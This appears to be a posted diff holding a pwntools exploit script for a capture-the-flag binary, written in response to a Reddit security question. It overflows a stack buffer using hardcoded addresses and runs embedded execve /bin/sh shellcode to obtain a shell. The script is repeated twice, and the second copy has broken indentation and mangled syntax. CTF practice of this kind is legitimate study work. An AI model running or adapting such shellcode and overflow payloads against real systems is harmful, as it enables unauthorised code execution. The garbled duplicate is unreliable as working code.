Caesurus · October 29, 2019 04:16
diff --git a/injection_exploit.py b/injection_exploit.py
 # in response to https://old.reddit.com/r/securityCTF/comments/dlvk57/getting_the_address_of_the_buffer_on_stack_right/
 # binary: https://sis-ctf.security.cs.pub.ro/download?file_key=71c9785434fc975eacb85fa0eda6288070f7ca03331a34ac56070d89264ff2d8&team_key=10ac18d83e9f697367026cebbd8fc6aff7a384018dce39e050d47ced4867b316
 #!/usr/bin/env python2
 # -*- coding: utf-8 -*-
 # This exploit template was generated via:
 # $ pwn template ./injection
 from pwn import *

 # Set up pwntools for the correct architecture
 exe = context.binary = ELF('./injection')

 def start(argv=[], *a, **kw):
    '''Start the exploit against the target.'''
    if args.GDB:
        return gdb.debug([exe.path] + argv, gdbscript=gdbscript, *a, **kw)
    else:
        return process([exe.path] + argv, *a, **kw)

 gdbscript = '''
 #break *0x{exe.symbols.main:x}
 b *0x080484ed
 continue
 '''.format(**locals())

 #===========================================================
 #                    EXPLOIT GOES HERE
 #===========================================================
 # Arch:     i386-32-little
 # RELRO:    No RELRO
 # Stack:    No canary found
 # NX:       NX disabled
 # PIE:      No PIE (0x8048000)
 # RWX:      Has RWX segments

 io = start()
 io.recvuntil("name")

 payload = "A"*(32)
 payload += p32(0x804a000)
 payload += p32(0x80484bf)
 io.sendline(payload)

 # this is 44 bytes, too big for 36 bytes before ret
 #shellcode = asm(shellcraft.sh()) 
 shellcode = "\x31\xc9\xf7\xe1\xb0\x0b\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80"
 #payload2 = cyclic(100) #found jaaa as the offset when trying to return
 # pwn cyclic -l jaaa

 payload2 = shellcode
 plen = len(payload2)
 # pad the rest 
 payload2 += 'A'*(36-plen)
 payload2 += p32(0x08049fe0)

 io.sendline(payload2)

 io.interactive()
	# in response to https://old.reddit.com/r/securityCTF/comments/dlvk57/getting_the_address_of_the_buffer_on_stack_right/
	# binary: https://sis-ctf.security.cs.pub.ro/download?file_key=71c9785434fc975eacb85fa0eda6288070f7ca03331a34ac56070d89264ff2d8&team_key=10ac18d83e9f697367026cebbd8fc6aff7a384018dce39e050d47ced4867b316
	#!/usr/bin/env python2
	# -- coding: utf-8 --
	# This exploit template was generated via:
	# $ pwn template ./injection
	from pwn import *

	# Set up pwntools for the correct architecture
	exe = context.binary = ELF('./injection')

	def start(argv=[], a, *kw):
	'''Start the exploit against the target.'''
	if args.GDB:
	return gdb.debug([exe.path] + argv, gdbscript=gdbscript, a, *kw)
	else:
	return process([exe.path] + argv, a, *kw)

	gdbscript = '''
	#break *0x{exe.symbols.main:x}
	b *0x080484ed
	continue
	'''.format(**locals())

	#===========================================================
	# EXPLOIT GOES HERE
	#===========================================================
	# Arch: i386-32-little
	# RELRO: No RELRO
	# Stack: No canary found
	# NX: NX disabled
	# PIE: No PIE (0x8048000)
	# RWX: Has RWX segments

	io = start()
	io.recvuntil("name")

	payload = "A"*(32)
	payload += p32(0x804a000)
	payload += p32(0x80484bf)
	io.sendline(payload)

	# this is 44 bytes, too big for 36 bytes before ret
	#shellcode = asm(shellcraft.sh())
	shellcode = "\x31\xc9\xf7\xe1\xb0\x0b\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80"
	#payload2 = cyclic(100) #found jaaa as the offset when trying to return
	# pwn cyclic -l jaaa

	payload2 = shellcode
	plen = len(payload2)
	# pad the rest
	payload2 += 'A'*(36-plen)
	payload2 += p32(0x08049fe0)

	io.sendline(payload2)

	io.interactive()